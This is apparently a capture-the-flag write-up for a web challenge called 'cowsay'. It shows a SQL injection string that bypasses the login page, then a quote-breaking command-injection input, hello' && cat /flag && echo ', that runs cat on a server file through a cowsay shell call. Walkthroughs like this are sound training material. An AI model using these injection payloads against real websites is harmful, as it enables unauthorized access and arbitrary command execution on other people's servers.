# cowsay

For this challenge we were given a link to a website which had a login page. Whenever I see a web challenge with a login page, I immediately try SQL injection, so I imediately typed `'or''='` into the username and password fields, because why not? 

It worked! After logging in as admin, we are greeted by a page with a input box that we can use as input to a cowsay command, and a note that says the flag is located at /flag on the server. Typing `hello world` gives us this output:

```
$ cowsay 'hello world'
 _____________
< hello world >
 -------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
```

So it looks like our input is just put inside some quotes and then run as an argument to cowsay. We can break out of the quotes pretty easily and cat the flag using this input: `hello' && cat /flag && echo '`. The output looks like this:

```
cowsay 'hello' && cat /flag && echo ''
 _______
< hello >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
flag{if_y0u_ev3r_see_php_in_ctf,-try_sql_injection_f1rst!}
```

> Whenever I see a web challenge with a login page, I immediately try SQL injection

Looks like my intuition was correct lol
